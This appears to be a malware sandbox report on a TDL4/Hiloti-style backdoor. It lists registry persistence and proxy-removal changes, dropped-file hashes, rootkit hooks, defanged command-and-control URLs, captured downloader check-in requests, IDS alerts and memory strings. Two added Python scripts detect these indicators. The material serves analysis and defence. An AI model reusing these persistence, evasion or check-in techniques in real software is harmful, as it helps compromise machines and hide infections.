[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Backdoor sets the IE Local intranet option "Include all network paths (UNCs)" (an IE default, written by WinInet/urlmon on zone initialisation, so weak evidence of tampering):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor sets the IE Local intranet option "Include all sites that bypass the proxy server" (also an IE default):
"ProxyBypass" = "1"
Proxy use is disabled for the current user; together with the values deleted below, this removes any user-configured proxy server, exception list or automatic-configuration (PAC) URL:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor sets the IE Local intranet option "Include all local (intranet) sites not listed in other zones" (also an IE default):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process rundll32.exe:340 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C E0 B6 F9 C9 D1 F0 FD C5 26 AE 2E 72 99 C2 10"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Wtube]
"Bveqayeweci" = "43 01 38 03 58 05 51 07 41 09 44 0B 48 0D 41 0F"
The process rundll32.exe:636 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C 2B 68 3C F6 94 9A F5 B7 D9 8D E8 3A B4 C1 42"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Wtube]
"Eqegaqojoqoka" = "196"
To run each time the current user logs on, the Backdoor registers its dropped DLL under the user's autorun key; rundll32.exe loads %WinDir%\msdnih.dll and calls its exported "Startup" function:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Ihoragiqinicim" = "rundll32.exe %WinDir%\msdnih.dll,Startup"
The process runonce.exe:396 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 CE 07 46 11 29 02 59 B5 4B F9 8D B7 41 D4 2F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"grpconv.exe" = "Windows Progman Group Converter"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Backdoor sets the IE Local intranet option "Include all local (intranet) sites not listed in other zones" (an IE default, written by WinInet/urlmon on zone initialisation, so weak evidence of tampering):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor sets the IE Local intranet option "Include all network paths (UNCs)" (also an IE default):
"UNCAsIntranet" = "1"
The Backdoor sets the IE Local intranet option "Include all sites that bypass the proxy server" (also an IE default):
"ProxyBypass" = "1"
The process deletes the following RunOnce value. This is ordinary RunOnce processing (runonce.exe removes each entry before executing it) consuming the "GrpConv" entry created by Rundll32.exe:132 below; it is not the Backdoor disabling another program's autostart:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv"
The process %original file name%.exe:556 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 F7 E0 5A A1 E8 C9 33 5A 2F A2 69 17 BB 09 3F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp]
"3IC.exe" = "3IC"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp]
"cb.exe" = "Systray .exe stub"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp]
"5tbp.exe" = "TouchChip USB Kernel Driver"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp]
"1EuroP.exe" = "1EuroP"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp]
"4IR.exe" = "4IR"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp]
"2gansta.exe" = "Test Two"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\1EuroP.exe,"
The Backdoor sets the IE Local intranet option "Include all local (intranet) sites not listed in other zones" (an IE default, written by WinInet/urlmon on zone initialisation, so weak evidence of tampering):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor sets the IE Local intranet option "Include all network paths (UNCs)" (also an IE default):
"UNCAsIntranet" = "1"
The Backdoor sets the IE Local intranet option "Include all sites that bypass the proxy server" (also an IE default):
"ProxyBypass" = "1"
The process Rundll32.exe:132 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 2E A7 00 08 AF DF BB 26 E3 D7 1F 71 B5 82 F2"
The following RunOnce value is written so that it executes at the next boot:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv" = "grpconv -o"
Note that "grpconv -o" runs the Windows Program Group Converter (%System%\grpconv.exe), not a dropped file. Windows typically writes this value itself as a side effect of INF-based installation through setupapi, which matches the Rundll32.exe:132 process that created it and the mdinstall.inf the dropper wrote and removed. The Backdoor's own autorun entries are the Run values listed in the removal section below: "ez88", pointing at lnhz9.exe in Application Data, and "Ihoragiqinicim", which loads %WinDir%\msdnih.dll through rundll32.exe.
The process grpconv.exe:1484 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F CD 41 11 B6 2C EB AF 5B F8 A1 08 B4 55 CB DB"
[HKCU\Software\Microsoft\Windows\CurrentVersion\GrpConv]
"Log" = "Init Application."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\MSProgramGroup\Shell\Open\Command]
"(Default)" = "%System%\grpconv.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCR\MSProgramGroup]
"(Default)" = "Microsoft Program Group"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\.grp]
"(Default)" = "MSProgramGroup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
The process 5tbp.exe:1264 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E0 27 62 FD 7E 63 A3 C0 E8 0F 6A D3 8F D5 14 A9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Wtube]
"Bveqayeweci" = "43 01 38 03 58 05 51 07 41 09 44 0B 48 0D 41 0F"
"Ydapup" = "35 01 33 03 37 05 45 07 4C 09 3F 0B 4A 0D 3A 0F"
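The registry entries above are the kind of data an analyst triages by hand. The following script is an added example for this report, not part of the sandbox output: it parses the report's own [key] / "name" = "value" notation and applies rules derived from the entries on this page (autorun values that point into user-writable directories, rundll32 loading a DLL from outside System32, a PendingFileRenameOperations entry with no destination, and the ZoneMap auto-detection triplet). The sample input is constructed from this page with the user-name placeholder replaced; the severity labels, the path hints and the benign allow-list are assumptions.

```python
"""Triage registry changes from a sandbox report for persistence and evasion indicators.

Added example (not part of the sandbox output). Parses the report's
[key] / "name" = "value" notation rather than a .reg export.
"""
import re
from typing import List, Tuple

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]*)"\s*=\s*"(.*)"$')

AUTORUN_KEY_SUFFIXES = ("\\currentversion\\run", "\\currentversion\\runonce")
USER_WRITABLE_HINTS = ("\\application data\\", "%appdata%", "\\temp\\", "\\local settings\\")
KNOWN_BENIGN_AUTORUNS = {("grpconv", "grpconv -o")}   # Windows Program Group Converter, written by INF setup
ZONEMAP_AUTODETECT = {"intranetname", "uncasintranet", "proxybypass"}

# Constructed from the registry section of this report (user name substituted for the placeholder).
SAMPLE_REPORT = r"""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
"UNCAsIntranet" = "1"
"ProxyBypass" = "1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\user\LOCALS~1\Temp\nsj3.tmp\1EuroP.exe,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv" = "grpconv -o"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ez88" = "%Documents and Settings%\%current user%\Application Data\lnhz9.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Ihoragiqinicim" = "rundll32.exe %WinDir%\msdnih.dll,Startup"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 2E A7 00 08 AF DF BB 26 E3 D7 1F 71 B5 82 F2"
"""

Triple = Tuple[str, str, str]   # (key, value name, value data)
Finding = Tuple[str, str]       # (severity, message)


def parse_report_registry(text: str) -> List[Triple]:
    """Turn the report notation into (key, name, value) triples, in document order."""
    triples: List[Triple] = []
    key = None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if m and key:
            triples.append((key, m.group(1), m.group(2)))
    return triples


def assess(triples: List[Triple]) -> List[Finding]:
    """Apply the persistence/evasion rules; findings keep the order of the input."""
    findings: List[Finding] = []
    zonemap_seen = set()
    for key, name, value in triples:
        k, n, v = key.lower(), name.lower(), value.lower()
        if k.endswith(AUTORUN_KEY_SUFFIXES):
            if (n, v) in KNOWN_BENIGN_AUTORUNS:
                findings.append(("info", f"{key}\\{name} = {value}: standard Windows entry, not an IOC"))
            elif any(h in v for h in USER_WRITABLE_HINTS):
                findings.append(("high", f"{key}\\{name}: autorun from a user-writable directory: {value}"))
            elif "rundll32" in v and "\\system32\\" not in v:
                findings.append(("high", f"{key}\\{name}: rundll32 loads a DLL outside System32: {value}"))
            else:
                findings.append(("review", f"{key}\\{name} = {value}"))
        elif n == "pendingfilerenameoperations":
            src, _, dst = value.partition(",")   # "src,dst"; an empty dst means delete at next boot
            if not dst.strip():
                findings.append(("medium", f"delete-on-reboot scheduled for {src}"))
        elif k.endswith("\\internet settings\\zonemap") and n in ZONEMAP_AUTODETECT and v == "1":
            zonemap_seen.add(n)
    if zonemap_seen == ZONEMAP_AUTODETECT:
        findings.append(("low", "IntranetName/UNCAsIntranet/ProxyBypass all 1: intranet auto-detection, weak indicator"))
    return findings


if __name__ == "__main__":
    for severity, message in assess(parse_report_registry(SAMPLE_REPORT)):
        print(f"[{severity:6s}] {message}")
```

Run on the sample it reports the delete-on-reboot of 1EuroP.exe, marks GrpConv as benign, flags both Run values as high and the ZoneMap triplet as low; the RNG Seed value produces nothing, which is the correct outcome for that noise entry.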
Dropped PE files
| MD5 | File path |
|---|---|
| b54d180b4b23166a77aa094abbb7e05e | c:\Documents and Settings\"%CurrentUserName%"\Application Data\lnhz9.exe |
| ae47033b743527c7e1f39f4297f53b68 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7.tmp |
| b9c28d93c32633293ff6e661431f663c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsj3.tmp\5tbp.exe |
| f15b3da3643e4c520b8a7c874db49d0e | c:\WINDOWS\msdnih.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using a kernel driver whose name the sandbox could not resolve (reported as "UNKNOWN"), the Backdoor registers a load-image notify routine (PsSetLoadImageNotifyRoutine), which gives it a callback every time an executable image or DLL is mapped into any process.
Using the driver at the unresolved path ROOTKITPATH, the Backdoor hooks DriverStartIo in the ATAPI miniport driver of the hard-disk controller so that it can filter the disk requests that touch its own storage:
StartIo
These two hooks, the Tdl4.YR verdict, and the strings recovered from the injected svchost.exe and spoolsv.exe memory below (\\?\globalroot\device\00000ff8\3f32a78a\cfg.ini, cmd.dll / cmd64.dll, ldr16 / ldr32 / ldr64, drv32 / drv64, kdcom.dll, \??\physicaldrive%d) are consistent with the TDL4 (TDSS) bootkit, which keeps its components in a hidden file system reached through a private device object and uses the ATAPI hook to conceal that storage from user-mode and most kernel-mode readers. That is why the removal section below starts with an anti-rootkit scan rather than with file deletion.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23458 | 23552 | 4.5133 | 2cec663f64ef38694dc96bb9f9cb766d |
| .rdata | 28672 | 4496 | 4608 | 3.58909 | db16645055619c0cc73276ff5c3adb75 |
| .data | 36864 | 3774424 | 1024 | 3.26654 | b9d0aa986d9e766521436f5ad38cd7c5 |
| .ndata | 3813376 | 32768 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 3846144 | 1736 | 2048 | 2.01899 | 2f2678dd9e97ae3fdffce33f180dbf60 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 78
13ab683047580206713a0f19ebe0427e
3a9d59d3c0513d9e09bdd7cd0913317a
09af02fa44c6bf227bb0d6e199a19499
6c77646a57ca346f85955675f504c751
52badfde88a0ee73f28b070519156057
35f27015c54bef542f360a7c2ba5c229
09044e8d1e7cb7f6883f983c17d17bcc
0503370605c61ff728ff008dc03a1825
709c892167fce654126edb577421be29
1dc8f3bb2a983d7137276a217b4d705b
0f339065053ebd425e75b23558963750
ca5d6a20d387eb2e49389f6a39636da9
8a2f117c3e780d2a0ee0aefc9602d738
14e473d02dd6b3107715a02a70cfc4ca
450999c36485a084aa7dd1b603da875b
a51b0e4d59528d3c37c089b3920aefe1
2f92f621850cf288ff8a61cc0a7e1034
0092c82b8f71c849b1799747344a0013
848bd0a9a22e7e72609328d19e9ac880
273bae01660db7dac324f798d2c8812b
e612517c3e59b53ffb829dab9699a8f7
5853e9ba1c8d75393dcef359471d5a9e
90eeaf37ac1ec866ddf48f1f56edf745
65b18506a33d72ec059fb281acf7f87e
485f7cc7b007342caccad569a8eb6b44
URLs
| URL | IP |
|---|---|
| hxxp://rooftopjam.in/?ini=v22MyzzjT4KjWDNmvVFHEeE2PuPsctM6PdFWTH11KB0CWwXTiUHUzGr1BVrHIQqMgMqV7ZlDeAiBMF4XAHPzfI6RtufQpKX/MPtpuu7okA== | |
| hxxp://bascheme.com/orltke/cqksml.php?adv=adv401&id=-1465484763&c=-183204857 | |
| hxxp://bascheme.com/orltke/mdhpjrpm.php?adv=adv401&id=-1465484763&c=-183204857 | |
| hxxp://050407e0092c.e-info-update.org/get2.php?c=HUXKCMMH&d=26606B67393437333F2F676268307D3F222023232C24243177757E4469747A2219151A4210121F150E5C434F11181F1C73750775000602077B0D080D787C7F077675720205077E047E7A7E08786B2C263E27372169646F617E31333F616F3B39570455020043070305545B4D031E180A024C472C455329031B12474B4C4D4E47B7B3BAB6BDA3F6F5E7EAB7CEF4FDE2E0E2F4E0BDD1CDD3B1F4FDABC4F9A0AFB9C3CDCCD7FBC09B978EDE9C9F919D88C98D8094C1898490D4D6DDD686E4ED8999A9A5A3B7A1F8F7F4F9FAFBF3FBFDFAF8F6949D81 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET TROJAN Tibs/Harnig Downloader Activity
ET TROJAN Suspicious User-Agent - Possible Trojan Downloader (ver18/ver19, etc)
ET TROJAN Hiloti/Mufanom Downloader Checkin
ET TROJAN Hiloti Style GET to PHP with invalid terse MSIE headers
ET TROJAN Long Fake wget 3.0 User-Agent Detected
ET TROJAN Artro Downloader User-Agent Detected
Traffic
GET /orltke/cqksml.php?adv=adv401&id=-1465484763&c=-183204857 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)ver76
Host: bascheme.com

HTTP/1.1 404 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Sun, 04 Sep 2016 05:52:59 GMT
Content-Type: text/html
Content-Length: 579
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.4.6 (Ubuntu)</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
(the padding comment appears six times; the capture then repeats the same response and is truncated with <<< skipped >>>)
GET /orltke/mdhpjrpm.php?adv=adv401&id=-1465484763&c=-183204857 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)ver76
Host: bascheme.com

HTTP/1.1 404 Not Found
Server: nginx/1.4.6 (Ubuntu)
Date: Sun, 04 Sep 2016 05:53:01 GMT
Content-Type: text/html
Content-Length: 579
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.4.6 (Ubuntu)</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
(the padding comment appears six times; the capture then repeats the same response and is truncated with <<< skipped >>>)
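Both check-ins carry the same three tells that the Emerging Threats signatures above key on: the User-Agent is an MSIE string with a bare "ver76" glued to its closing parenthesis (the same "ver76" prefix appears in the format strings recovered from the injected Explorer.EXE memory below), the request is a GET to a random-letter .php script with the fixed query shape adv=adv401&id=<int>&c=<int>, and the request has none of the Accept headers a real Internet Explorer sends. Both requests got a 404 from bascheme.com at capture time, so no second stage was retrieved in this run. The script below is an added example, not part of the sandbox output, that implements those three checks over raw requests; the two check-ins are copied from this page, the benign request is constructed, and the regexes, the 4-12 letter script-name bound and the expected-header list are assumptions.

```python
"""Flag Hiloti/Mufanom-style downloader check-ins in raw HTTP requests.

Added example for this report, not part of the sandbox output.
Indicators: 1) fake MSIE User-Agent ending in ")verNN", 2) GET to a random
<letters>.php with adv=advNNN&id=<int>&c=<int>, 3) MSIE User-Agent without
the Accept / Accept-Language headers a genuine IE request carries.
"""
import re
from urllib.parse import parse_qs, urlsplit

UA_VER_SUFFIX = re.compile(r"\)ver\d{1,3}$")                 # "... .NET4.0C)ver76"
HILOTI_PATH = re.compile(r"^/(?:[^/?]+/)*[a-z]{4,12}\.php$")  # "/orltke/cqksml.php"
INT_RE = re.compile(r"-?\d+")
IE_EXPECTED_HEADERS = ("accept", "accept-language")          # assumption: genuine MSIE always sends both

# The two check-ins captured above, plus one constructed benign IE request.
SAMPLE_REQUESTS = {
    "checkin_1": (
        "GET /orltke/cqksml.php?adv=adv401&id=-1465484763&c=-183204857 HTTP/1.1\r\n"
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; "
        ".NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)ver76\r\n"
        "Host: bascheme.com\r\n\r\n"
    ),
    "checkin_2": (
        "GET /orltke/mdhpjrpm.php?adv=adv401&id=-1465484763&c=-183204857 HTTP/1.1\r\n"
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; "
        ".NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)ver76\r\n"
        "Host: bascheme.com\r\n\r\n"
    ),
    "benign_ie": (
        "GET /index.php?page=1 HTTP/1.1\r\n"
        "Accept: text/html, application/xhtml+xml, */*\r\n"
        "Accept-Language: en-US\r\n"
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "Host: www.example.com\r\n"
        "Connection: Keep-Alive\r\n\r\n"
    ),
}


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, target, version and a lower-cased header map."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def hiloti_indicators(raw: str) -> list:
    """Names of the indicators that fire on one request; empty list means nothing matched."""
    req = parse_request(raw)
    ua = req["headers"].get("user-agent", "")
    hits = []
    if UA_VER_SUFFIX.search(ua):
        hits.append("ua-ver-suffix")
    parts = urlsplit(req["target"])
    if req["method"] == "GET" and HILOTI_PATH.match(parts.path):
        qs = parse_qs(parts.query)
        adv = qs.get("adv", [""])[0]
        ident = qs.get("id", [""])[0]
        counter = qs.get("c", [""])[0]
        if re.fullmatch(r"adv\d+", adv) and INT_RE.fullmatch(ident) and INT_RE.fullmatch(counter):
            hits.append("hiloti-php-query")
    if "MSIE" in ua and not all(h in req["headers"] for h in IE_EXPECTED_HEADERS):
        hits.append("terse-msie-headers")
    return hits


def scan(requests: dict) -> dict:
    """Run the indicators over a name -> raw request map."""
    return {name: hiloti_indicators(raw) for name, raw in requests.items()}


if __name__ == "__main__":
    for name, hits in scan(SAMPLE_REQUESTS).items():
        print(f"{name:10s} {'ALERT ' + ','.join(hits) if hits else 'clean'}")
```

Any one indicator alone is noisy (plenty of legitimate PHP endpoints take an id parameter); the combination of all three on a single request is what makes this traffic distinctive, which is also how the ET "invalid terse MSIE headers" rule is framed.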
The Backdoor connects to the servers at the following location(s):
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s
rundll32.exe_636_rwx_10000000_00001000:
.text
`.data
.reloc
lnhz9.exe_352:
`.rsrc
tl.We
SHDocVwCtl.WebBrowser
VB5!6&vb6chs.dll
shdocvw.dll
WebBrowser
shell32.dll
psapi.dll
%System%\shdocvw.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
shlwapi.dll
VBA6.DLL
advapi32.dll
RegOpenKeyA
RegOpenKeyExA
RegCloseKey
RegCreateKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegQueryInfoKeyA
InternetOpenUrlA
wininet.dll
HttpQueryInfoA
netapi32.dll
kernel32.dll
GetProcessHeap
IPHLPAPI.DLL
GetExtendedTcpTable
SetTcpEntry
%System%\msvbvm60.dll\3
gTTuDPrLqOgsgeYqnKuEKG
.text
`.data
.rsrc
$(9999,048
kYg%D
}.rsrc
KERNEL32.DLL
MSVBVM60.DLL
USER32.DLL
ADVAPI32.DLL
WININET.DLL
DataExecutionPrevention_SupportPolicy
1.01.0001
6hOJ5TI7NaFF0jGgvCqBuzUGD6ROpFip.exe
lnhz9.exe_352_rwx_00401000_0002C000:
SHDocVwCtl.WebBrowser
VB5!6&vb6chs.dll
shdocvw.dll
WebBrowser
shell32.dll
psapi.dll
%System%\shdocvw.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
shlwapi.dll
VBA6.DLL
advapi32.dll
RegOpenKeyA
RegOpenKeyExA
RegCloseKey
RegCreateKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegQueryInfoKeyA
InternetOpenUrlA
wininet.dll
HttpQueryInfoA
netapi32.dll
kernel32.dll
GetProcessHeap
IPHLPAPI.DLL
GetExtendedTcpTable
SetTcpEntry
%System%\msvbvm60.dll\3
gTTuDPrLqOgsgeYqnKuEKG
.text
`.data
.rsrc
$(9999,048
USER32.DLL
KERNEL32.DLL
ADVAPI32.DLL
WININET.DLL
DataExecutionPrevention_SupportPolicy
lnhz9.exe_220:
`.rsrc
tl.We
SHDocVwCtl.WebBrowser
VB5!6&vb6chs.dll
shdocvw.dll
WebBrowser
shell32.dll
psapi.dll
%System%\shdocvw.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
shlwapi.dll
VBA6.DLL
advapi32.dll
RegOpenKeyA
